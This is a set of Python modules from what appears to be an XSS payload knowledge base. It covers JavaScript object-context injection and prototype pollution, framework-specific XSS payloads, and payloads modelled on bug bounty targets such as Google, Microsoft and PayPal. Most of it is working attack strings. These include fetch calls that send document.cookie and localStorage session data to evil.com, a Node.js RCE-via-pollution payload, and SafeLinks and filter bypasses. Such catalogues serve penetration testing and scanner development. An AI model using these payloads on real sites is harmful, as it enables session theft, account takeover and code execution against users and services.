WEB_COMPONENT_PAYLOADS_TOTAL = len(WEB_COMPONENT_PAYLOADS)



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-04 19:21:27 UTC
Status: Created
Telegram: https://t.me/easyprotech

JavaScript Object Context - Attack Vectors Module
"""

ATTACK_VECTOR = """
UNQUOTED VALUE INJECTION:

1. BASIC PROPERTY INJECTION:
   <script>var config = {admin: USER_INPUT};</script>

   Payload (unquoted):
   true, exploit: alert(1), real: false

   Result:
   <script>var config = {admin: true, exploit: alert(1), real: false};</script>

2. METHOD INJECTION:
   Payload:
   false, hack: function(){alert(1)}, real: true

   Result:
   <script>var config = {admin: false, hack: function(){alert(1)}, real: true};</script>

3. COMPUTED PROPERTY INJECTION:
   Payload:
   null, [alert(1)]: true, x: null

   Result:
   <script>var config = {value: null, [alert(1)]: true, x: null};</script>

QUOTED STRING BREAKOUT:

4. BREAKING OUT OF STRING VALUE:
   <script>var user = {name: 'USER_INPUT'};</script>

   Payloads:
   ', admin: true, real: '
   ', hack: alert(1), x: '
   ', get value(){return alert(1)}, x: '

   Result:
   <script>var user = {name: '', admin: true, real: ''};</script>

5. DOUBLE QUOTE BREAKOUT:
   <script>var config = {key: "USER_INPUT"};</script>

   Payload:
   ", exploit: alert(1), real: "

   Result:
   <script>var config = {key: "", exploit: alert(1), real: ""};</script>

6. TEMPLATE LITERAL IN OBJECT:
   <script>var obj = {msg: `USER_INPUT`};</script>

   Payload:
   ${alert(1)}

   Result:
   <script>var obj = {msg: `${alert(1)}`};</script>

PROTOTYPE POLLUTION ATTACKS:

7. __PROTO__ INJECTION:
   <script>var config = USER_INPUT;</script>

   Payload:
   {"__proto__": {"polluted": true}}
   {"__proto__": {"isAdmin": true}}
   {"__proto__": {"toString": "alert(1)"}}

   After merge/assign:
   Object.prototype.polluted === true // All objects affected!

8. CONSTRUCTOR POLLUTION:
   Payload:
   {"constructor": {"prototype": {"isAdmin": true}}}

   Affects constructor's prototype

9. PROTOTYPE POLLUTION TO XSS:
   Step 1: Pollute
   {"__proto__": {"innerHTML": "<img src=x onerror=alert(1)>"}}

   Step 2: Trigger when code does:
   someElement[unknownProp] // Falls back to prototype

   Or:
   {"__proto__": {"src": "javascript:alert(1)"}}

   Then code that does:
   img.src = obj.src || defaultSrc;

10. PROTOTYPE POLLUTION VIA NESTED PATH:
    Payload:
    {"__proto__.polluted": "yes"}
    {"constructor.prototype.isAdmin": true}

    Some parsers treat dot as nested property

11. ARRAY INDEX POLLUTION:
    Payload:
    {"__proto__": [1, 2, 3]}

    Or:
    {"__proto__[0]": "polluted"}

GETTER/SETTER INJECTION:

12. GETTER WITH SIDE EFFECTS:
    Payload:
    {get value(){alert(1); return 1}}
    {get x(){fetch('//evil.com?c='+document.cookie); return null}}

    Executed when property is accessed:
    console.log(obj.value); // Triggers alert

13. SETTER INJECTION:
    Payload:
    {set value(v){alert(v)}}

    Executed when property is set:
    obj.value = 'test'; // Triggers alert('test')

14. COMBINED GETTER/SETTER:
    Payload:
    {
      get admin(){return true},
      set admin(v){alert('Setting admin to: '+v)}
    }

COMPUTED PROPERTY NAMES:

15. EXPRESSION IN PROPERTY NAME:
    <script>var obj = {[USER_INPUT]: 'value'};</script>

    Payload:
    alert(1)

    Result:
    <script>var obj = {[alert(1)]: 'value'};</script>
    (alert executes during property name evaluation)

16. COMPUTED WITH TEMPLATE:
    Payload:
    `${alert(1)}`

    Result:
    <script>var obj = {[`${alert(1)}`]: 'value'};</script>

17. BREAKING OUT OF COMPUTED:
    <script>var obj = {[`key_${USER_INPUT}`]: val};</script>

    Payload:
    ${alert(1)}`]: null, exploit: alert(2), real: {[`x

    Result:
    <script>var obj = {[`key_${alert(1)}`]: null, exploit: alert(2), real: {[`x`]: val};</script>

METHOD AND FUNCTION INJECTION:

18. METHOD SHORTHAND:
    Payload:
    null, exploit(){alert(1)}, real:null

    Result:
    <script>var obj = {value: null, exploit(){alert(1)}, real:null};</script>

19. ARROW FUNCTION:
    Payload:
    null, hack: ()=>alert(1), real: null

    Result:
    <script>var obj = {value: null, hack: ()=>alert(1), real: null};</script>

20. ASYNC METHOD:
    Payload:
    null, async exploit(){await fetch('//evil.com')}, real:null

21. GENERATOR METHOD:
    Payload:
    null, *gen(){yield alert(1)}, real:null

SYMBOL PROPERTY INJECTION:

22. SYMBOL AS KEY:
    Payload:
    [Symbol.toPrimitive]: function(){return alert(1)}
    [Symbol.iterator]: function*(){yield alert(1)}
    [Symbol.toStringTag]: alert(1)

OBJECT SPREAD EXPLOITATION:

23. SPREAD OPERATOR POLLUTION:
    <script>var merged = {...defaults, ...USER_INPUT};</script>

    If USER_INPUT is:
    {__proto__: {polluted: true}}

    Can pollute Object.prototype

24. NESTED SPREAD:
    <script>var obj = {a: {...USER_INPUT}};</script>

    Payload:
    {__proto__: {polluted: true}}

BREAKING OUT OF OBJECT LITERAL:

25. CLOSING BRACE:
    <script>var obj = {key: USER_INPUT};</script>

    Payload:
    null}; alert(1); var obj2 = {key: null

    Result:
    <script>var obj = {key: null}; alert(1); var obj2 = {key: null};</script>

26. CLOSING NESTED OBJECT:
    <script>var obj = {nested: {value: USER_INPUT}};</script>

    Payload:
    null}}, exploit: alert(1), real: {value: null

    Result:
    <script>var obj = {nested: {value: null}}, exploit: alert(1), real: {value: null}};</script>

27. ARRAY IN OBJECT BREAKOUT:
    <script>var obj = {items: [USER_INPUT]};</script>

    Payload:
    null]}, exploit: alert(1), real: {items: [null

    Result:
    <script>var obj = {items: [null]}, exploit: alert(1), real: {items: [null]};</script>

JSON.PARSE EXPLOITATION:

28. JSON STRING INJECTION:
    <script>var obj = JSON.parse('USER_INPUT');</script>

    Payload:
    {"__proto__": {"polluted": true}}

    If JSON.parse is vulnerable (older libraries)

29. JSON WITH REVIVER:
    <script>
    var obj = JSON.parse(USER_INPUT, function(k, v) {
        if (k === '__proto__') return; // Attempted protection
        return v;
    });
    </script>

    Bypass:
    {"constructor": {"prototype": {"polluted": true}}}

30. JSON UNICODE ESCAPE:
    Payload:
    {"\\u005f\\u005fproto\\u005f\\u005f": {"polluted": true}}
    (\\u005f = underscore)

FRAMEWORK-SPECIFIC ATTACKS:

31. LODASH MERGE POLLUTION:
    _.merge(target, USER_INPUT)

    Payload:
    {"__proto__": {"polluted": true}}

    Affects: lodash < 4.17.11

32. JQUERY EXTEND POLLUTION:
    $.extend(true, target, USER_INPUT)

    Payload:
    {"__proto__": {"polluted": true}}

    Affects: jQuery < 3.4.0

33. HOEK MERGE (HAPI.JS):
    Hoek.merge(target, USER_INPUT)

    Payload:
    {"__proto__": {"polluted": true}}

    Affects: hoek < 5.0.3

34. MINIMIST PARSER:
    minimist(USER_INPUT)

    Payload:
    ['--__proto__.polluted=true']

    Affects: minimist < 1.2.6

REAL-WORLD ATTACK SCENARIOS:

AUTHENTICATION BYPASS VIA PROTOTYPE POLLUTION:
<script>
var user = {"__proto__": {"isAdmin": true}};
Object.assign(currentUser, user);
// Now: if (currentUser.isAdmin) { /* access granted */ }
</script>

SESSION HIJACKING:
<script>
var config = {
    apiKey: null,
    steal: function() {
        fetch('//evil.com?c=' + document.cookie + '&s=' + localStorage.getItem('session'));
    },
    real: null
};
config.steal();
</script>

DOM-BASED XSS VIA POLLUTION:
<script>
// Pollute prototype
merge(defaults, {"__proto__": {"innerHTML": "<img src=x onerror=alert(1)>"}});

// Later in code:
element[someProperty] = "value";
// If someProperty is undefined, falls back to prototype.innerHTML
</script>

RCE VIA PROTOTYPE POLLUTION (Node.js):
// In server-side Node.js
const obj = {};
merge(obj, JSON.parse(userInput));
// Payload: {"__proto__": {"shell": "/bin/bash", "argv0": "exploit"}}
// Later: child_process.spawn() uses polluted properties

DENIAL OF SERVICE:
<script>
var config = {
    get value() {
        while(1) {} // Infinite loop
        return null;
    }
};
console.log(config.value); // DoS
</script>
"""



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Active
Telegram: https://t.me/EasyProTech

Modern JavaScript Frameworks XSS Payloads
Covers: Svelte, SvelteKit, Astro, Qwik, Remix, SolidJS, Lit, Preact, Nuxt, Next.js, Ember, Backbone
"""

from ..models import Encoding, PayloadEntry, Reliability, Severity


# === Svelte Payloads ===
SVELTE_PAYLOADS = {
    "svelte-html-directive": PayloadEntry(
        payload='{@html "<img src=x onerror=alert(1)>"}',
        contexts=["svelte", "html_content", "template"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="Svelte @html directive for raw HTML injection",
        tags=["svelte", "framework", "@html", "directive"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "svelte-bind-innerHTML": PayloadEntry(
        payload="<div bind:innerHTML={xss}></div>",
        contexts=["svelte", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Svelte bind:innerHTML for DOM injection",
        tags=["svelte", "framework", "bind", "innerHTML"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "svelte-on-event": PayloadEntry(
        payload="<button on:click={() => alert(1)}>Click</button>",
        contexts=["svelte", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Svelte on:click event handler",
        tags=["svelte", "framework", "event", "on:click"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "svelte-action": PayloadEntry(
        payload="<div use:action={(node) => { alert(1) }}></div>",
        contexts=["svelte", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Svelte action directive for code execution",
        tags=["svelte", "framework", "action", "use"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === SvelteKit Payloads ===
SVELTEKIT_PAYLOADS = {
    "sveltekit-load-function": PayloadEntry(
        payload='export async function load() { return { xss: "<script>alert(1)</script>" } }',
        contexts=["sveltekit", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="SvelteKit load function data injection",
        tags=["sveltekit", "framework", "load", "ssr"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "sveltekit-form-action": PayloadEntry(
        payload='<form method="POST" action="?/xss"><input name="payload" value="<script>alert(1)</script>"></form>',
        contexts=["sveltekit", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="SvelteKit form action injection",
        tags=["sveltekit", "framework", "form", "action"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "sveltekit-page-data": PayloadEntry(
        payload='<script>const data = {"xss":"<img src=x onerror=alert(1)>"};</script>',
        contexts=["sveltekit", "javascript", "json"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="SvelteKit page data JSON injection",
        tags=["sveltekit", "framework", "data", "json"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Astro Payloads ===
ASTRO_PAYLOADS = {
    "astro-set-html": PayloadEntry(
        payload="<div set:html={userInput}></div>",
        contexts=["astro", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="Astro set:html directive for raw HTML",
        tags=["astro", "framework", "set:html", "directive"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "astro-client-directive": PayloadEntry(
        payload="<Component client:load onMount={() => alert(1)} />",
        contexts=["astro", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Astro client directive with event handler",
        tags=["astro", "framework", "client", "directive"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "astro-script-inline": PayloadEntry(
        payload="<script is:inline>alert(1)</script>",
        contexts=["astro", "html_content", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=8.0,
        description="Astro inline script execution",
        tags=["astro", "framework", "script", "inline"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "astro-define-vars": PayloadEntry(
        payload='<script define:vars={{ xss: "<script>alert(1)</script>" }}></script>',
        contexts=["astro", "html_content", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Astro define:vars injection",
        tags=["astro", "framework", "define", "vars"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Qwik Payloads ===
QWIK_PAYLOADS = {
    "qwik-dangerouslySetInnerHTML": PayloadEntry(
        payload="<div dangerouslySetInnerHTML={userInput}></div>",
        contexts=["qwik", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="Qwik dangerouslySetInnerHTML injection",
        tags=["qwik", "framework", "innerHTML", "dangerous"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "qwik-dollar-handler": PayloadEntry(
        payload="<button onClick$={() => alert(1)}>Click</button>",
        contexts=["qwik", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Qwik $ suffix event handler",
        tags=["qwik", "framework", "event", "dollar"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "qwik-useVisibleTask": PayloadEntry(
        payload="useVisibleTask$(() => { alert(1) })",
        contexts=["qwik", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Qwik useVisibleTask for client-side execution",
        tags=["qwik", "framework", "task", "visible"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Remix Payloads ===
REMIX_PAYLOADS = {
    "remix-loader-injection": PayloadEntry(
        payload='export async function loader() { return json({ xss: "<script>alert(1)</script>" }) }',
        contexts=["remix", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Remix loader function data injection",
        tags=["remix", "framework", "loader", "json"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "remix-action-injection": PayloadEntry(
        payload="export async function action({ request }) { /* XSS in response */ }",
        contexts=["remix", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Remix action function injection",
        tags=["remix", "framework", "action", "form"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "remix-dangerouslySetInnerHTML": PayloadEntry(
        payload="<div dangerouslySetInnerHTML={{ __html: userInput }}></div>",
        contexts=["remix", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="Remix dangerouslySetInnerHTML in JSX",
        tags=["remix", "framework", "innerHTML", "jsx"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === SolidJS Payloads ===
SOLIDJS_PAYLOADS = {
    "solidjs-innerHTML": PayloadEntry(
        payload="<div innerHTML={userInput}></div>",
        contexts=["solidjs", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="SolidJS innerHTML prop injection",
        tags=["solidjs", "framework", "innerHTML"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "solidjs-event": PayloadEntry(
        payload="<button onClick={() => alert(1)}>Click</button>",
        contexts=["solidjs", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="SolidJS onClick event handler",
        tags=["solidjs", "framework", "event", "onClick"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "solidjs-ref-callback": PayloadEntry(
        payload='<div ref={(el) => { el.innerHTML = "<img src=x onerror=alert(1)>" }}></div>',
        contexts=["solidjs", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="SolidJS ref callback DOM manipulation",
        tags=["solidjs", "framework", "ref", "callback"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Lit Element Payloads ===
LIT_PAYLOADS = {
    "lit-unsafeHTML": PayloadEntry(
        payload="html`${unsafeHTML(userInput)}`",
        contexts=["lit", "lit_element", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="Lit unsafeHTML directive for raw HTML",
        tags=["lit", "framework", "unsafeHTML", "directive"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "lit-unsafeSVG": PayloadEntry(
        payload="svg`${unsafeSVG(userInput)}`",
        contexts=["lit", "lit_element", "svg"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Lit unsafeSVG directive for SVG injection",
        tags=["lit", "framework", "unsafeSVG", "svg"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "lit-event-listener": PayloadEntry(
        payload="html`<button @click=${() => alert(1)}>Click</button>`",
        contexts=["lit", "lit_element", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Lit @click event listener",
        tags=["lit", "framework", "event", "@click"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Preact Payloads ===
PREACT_PAYLOADS = {
    "preact-dangerouslySetInnerHTML": PayloadEntry(
        payload="<div dangerouslySetInnerHTML={{ __html: userInput }}></div>",
        contexts=["preact", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="Preact dangerouslySetInnerHTML injection",
        tags=["preact", "framework", "innerHTML", "dangerous"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "preact-ref-callback": PayloadEntry(
        payload='<div ref={(el) => { if(el) el.innerHTML = "<img src=x onerror=alert(1)>" }}></div>',
        contexts=["preact", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Preact ref callback DOM manipulation",
        tags=["preact", "framework", "ref", "callback"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Nuxt Payloads ===
NUXT_PAYLOADS = {
    "nuxt-v-html": PayloadEntry(
        payload='<div v-html="userInput"></div>',
        contexts=["nuxt", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="Nuxt v-html directive (Vue-based)",
        tags=["nuxt", "vue", "framework", "v-html"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "nuxt-useFetch-injection": PayloadEntry(
        payload="const { data } = await useFetch('/api/xss')",
        contexts=["nuxt", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Nuxt useFetch data injection",
        tags=["nuxt", "framework", "fetch", "composable"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Next.js App Router Payloads ===
NEXTJS_APPROUTER_PAYLOADS = {
    "nextjs-approuter-dangerouslySetInnerHTML": PayloadEntry(
        payload="<div dangerouslySetInnerHTML={{ __html: userInput }}></div>",
        contexts=["nextjs", "nextjs_approuter", "html_content"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="Next.js App Router dangerouslySetInnerHTML",
        tags=["nextjs", "approuter", "framework", "innerHTML"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "nextjs-server-component-injection": PayloadEntry(
        payload="export default async function Page() { const data = await fetch(...); /* XSS */ }",
        contexts=["nextjs", "nextjs_approuter", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Next.js Server Component data injection",
        tags=["nextjs", "approuter", "server", "component"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Ember Payloads ===
EMBER_PAYLOADS = {
    "ember-triple-curlies": PayloadEntry(
        payload="{{{userInput}}}",
        contexts=["ember", "html_content", "template"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="Ember triple curly braces for unescaped HTML",
        tags=["ember", "framework", "handlebars", "triple"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "ember-htmlSafe": PayloadEntry(
        payload="{{htmlSafe userInput}}",
        contexts=["ember", "html_content", "template"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="Ember htmlSafe helper for raw HTML",
        tags=["ember", "framework", "htmlSafe", "helper"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "ember-action": PayloadEntry(
        payload='<button {{action "xss"}}>Click</button>',
        contexts=["ember", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Ember action helper",
        tags=["ember", "framework", "action", "event"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Backbone Payloads ===
BACKBONE_PAYLOADS = {
    "backbone-el-html": PayloadEntry(
        payload="this.$el.html(userInput)",
        contexts=["backbone", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="Backbone.js $el.html() injection",
        tags=["backbone", "framework", "jquery", "html"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "backbone-template": PayloadEntry(
        payload='_.template("<div><%= userInput %></div>")',
        contexts=["backbone", "javascript", "template"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Backbone underscore template injection",
        tags=["backbone", "framework", "underscore", "template"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === jQuery Payloads ===
JQUERY_PAYLOADS = {
    "jquery-html": PayloadEntry(
        payload='$("div").html(userInput)',
        contexts=["jquery", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="jQuery .html() method injection",
        tags=["jquery", "library", "html", "method"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "jquery-append": PayloadEntry(
        payload='$("div").append(userInput)',
        contexts=["jquery", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="jQuery .append() method injection",
        tags=["jquery", "library", "append", "method"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "jquery-selector-xss": PayloadEntry(
        payload="$('<img src=x onerror=alert(1)>')",
        contexts=["jquery", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="jQuery selector HTML creation",
        tags=["jquery", "library", "selector", "creation"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "jquery-attr-href": PayloadEntry(
        payload='$("a").attr("href", "javascript:alert(1)")',
        contexts=["jquery", "javascript", "url"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="jQuery .attr() href injection",
        tags=["jquery", "library", "attr", "href"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Tauri Payloads ===
TAURI_PAYLOADS = {
    "tauri-invoke": PayloadEntry(
        payload='await invoke("run_command", { cmd: userInput })',
        contexts=["tauri", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=9.5,
        description="Tauri invoke with command injection (RCE)",
        tags=["tauri", "desktop", "invoke", "rce"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "tauri-shell-open": PayloadEntry(
        payload="await open(userInput)",
        contexts=["tauri", "javascript", "url"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="Tauri shell open for URL/file access",
        tags=["tauri", "desktop", "shell", "open"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Capacitor Payloads ===
CAPACITOR_PAYLOADS = {
    "capacitor-browser-open": PayloadEntry(
        payload='await Browser.open({ url: "javascript:alert(1)" })',
        contexts=["capacitor", "javascript", "url"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Capacitor Browser plugin JavaScript URL",
        tags=["capacitor", "mobile", "browser", "plugin"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    "capacitor-filesystem": PayloadEntry(
        payload='await Filesystem.writeFile({ path: userInput, data: "..." })',
        contexts=["capacitor", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=8.5,
        description="Capacitor Filesystem path traversal",
        tags=["capacitor", "mobile", "filesystem", "plugin"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# Combined database
MODERN_FRAMEWORKS_PAYLOADS = {
    **SVELTE_PAYLOADS,
    **SVELTEKIT_PAYLOADS,
    **ASTRO_PAYLOADS,
    **QWIK_PAYLOADS,
    **REMIX_PAYLOADS,
    **SOLIDJS_PAYLOADS,
    **LIT_PAYLOADS,
    **PREACT_PAYLOADS,
    **NUXT_PAYLOADS,
    **NEXTJS_APPROUTER_PAYLOADS,
    **EMBER_PAYLOADS,
    **BACKBONE_PAYLOADS,
    **JQUERY_PAYLOADS,
    **TAURI_PAYLOADS,
    **CAPACITOR_PAYLOADS,
}

MODERN_FRAMEWORKS_TOTAL = len(MODERN_FRAMEWORKS_PAYLOADS)



# Project: BRS-KB
# Company: EasyProTech LLC (www.easypro.tech)
# Dev: Brabus
# Date: 2025-12-26 UTC
# Status: Created
# Telegram: https://t.me/EasyProTech

"""
Real Bug Bounty XSS Payloads

Payloads inspired by real bug bounty reports and disclosed vulnerabilities.
These are actual patterns that worked in real targets.
"""

from ..models import PayloadEntry


BRS_KB_BUGBOUNTY_REAL_PAYLOADS = {
    # ============================================================
    # GOOGLE BUG BOUNTY STYLE
    # ============================================================
    "google-amp-xss": PayloadEntry(
        payload='<amp-script src="data:text/javascript,alert(1)">',
        contexts=["html_content"],
        severity="high",
        cvss_score=8.0,
        description="AMP script tag bypass (Google style)",
        tags=["google", "amp", "bugbounty"],
        bypasses=["amp_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    "google-docs-formula-xss": PayloadEntry(
        payload='=IMAGE("javascript:alert(1)")',
        contexts=["json"],
        severity="high",
        cvss_score=8.0,
        description="Google Docs formula injection pattern",
        tags=["google", "docs", "formula"],
        bypasses=["formula_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    "google-translate-xss": PayloadEntry(
        payload='<a href="//translate.google.com/translate?u=javascript:alert(1)">',
        contexts=["html_content"],
        severity="medium",
        cvss_score=6.5,
        description="Google Translate redirect pattern",
        tags=["google", "translate"],
        bypasses=["url_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # FACEBOOK BUG BOUNTY STYLE
    # ============================================================
    "facebook-open-graph-xss": PayloadEntry(
        payload='<meta property="og:url" content="javascript:alert(1)">',
        contexts=["html_content"],
        severity="medium",
        cvss_score=6.0,
        description="Open Graph meta tag injection",
        tags=["facebook", "opengraph"],
        bypasses=["meta_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    "facebook-share-xss": PayloadEntry(
        payload="https://www.facebook.com/sharer/sharer.php?u=javascript:alert(document.domain)",
        contexts=["url"],
        severity="high",
        cvss_score=7.5,
        description="Facebook share dialog pattern",
        tags=["facebook", "share"],
        bypasses=["url_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # TWITTER/X BUG BOUNTY STYLE
    # ============================================================
    "twitter-card-xss": PayloadEntry(
        payload='<meta name="twitter:player" content="javascript:alert(1)">',
        contexts=["html_content"],
        severity="medium",
        cvss_score=6.0,
        description="Twitter Card player injection",
        tags=["twitter", "card"],
        bypasses=["meta_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    "twitter-intent-xss": PayloadEntry(
        payload='https://twitter.com/intent/tweet?text="><img src=x onerror=alert(1)>',
        contexts=["url"],
        severity="high",
        cvss_score=7.5,
        description="Twitter intent parameter injection",
        tags=["twitter", "intent"],
        bypasses=["param_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # MICROSOFT BUG BOUNTY STYLE
    # ============================================================
    "outlook-safelinks-bypass": PayloadEntry(
        payload="https://safelinks.protection.outlook.com/?url=javascript%3Aalert(1)",
        contexts=["url"],
        severity="high",
        cvss_score=8.0,
        description="Outlook SafeLinks bypass pattern",
        tags=["microsoft", "outlook", "safelinks"],
        bypasses=["safelinks"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    "teams-deeplink-xss": PayloadEntry(
        payload='msteams://teams.microsoft.com/l/chat/0/0?users="><script>alert(1)</script>',
        contexts=["url"],
        severity="high",
        cvss_score=8.0,
        description="Microsoft Teams deeplink injection",
        tags=["microsoft", "teams", "deeplink"],
        bypasses=["deeplink_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # PAYPAL BUG BOUNTY STYLE
    # ============================================================
    "paypal-callback-xss": PayloadEntry(
        payload="return_url=javascript:alert(document.domain)",
        contexts=["url"],
        severity="critical",
        cvss_score=9.0,
        description="PayPal return URL injection",
        tags=["paypal", "callback"],
        bypasses=["url_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="low",
    ),
    # ============================================================
    # SHOPIFY BUG BOUNTY STYLE
    # ============================================================
    "shopify-liquid-xss": PayloadEntry(
        payload='{{ "test" | append: "<script>alert(1)</script>" }}',
        contexts=["template"],
        severity="high",
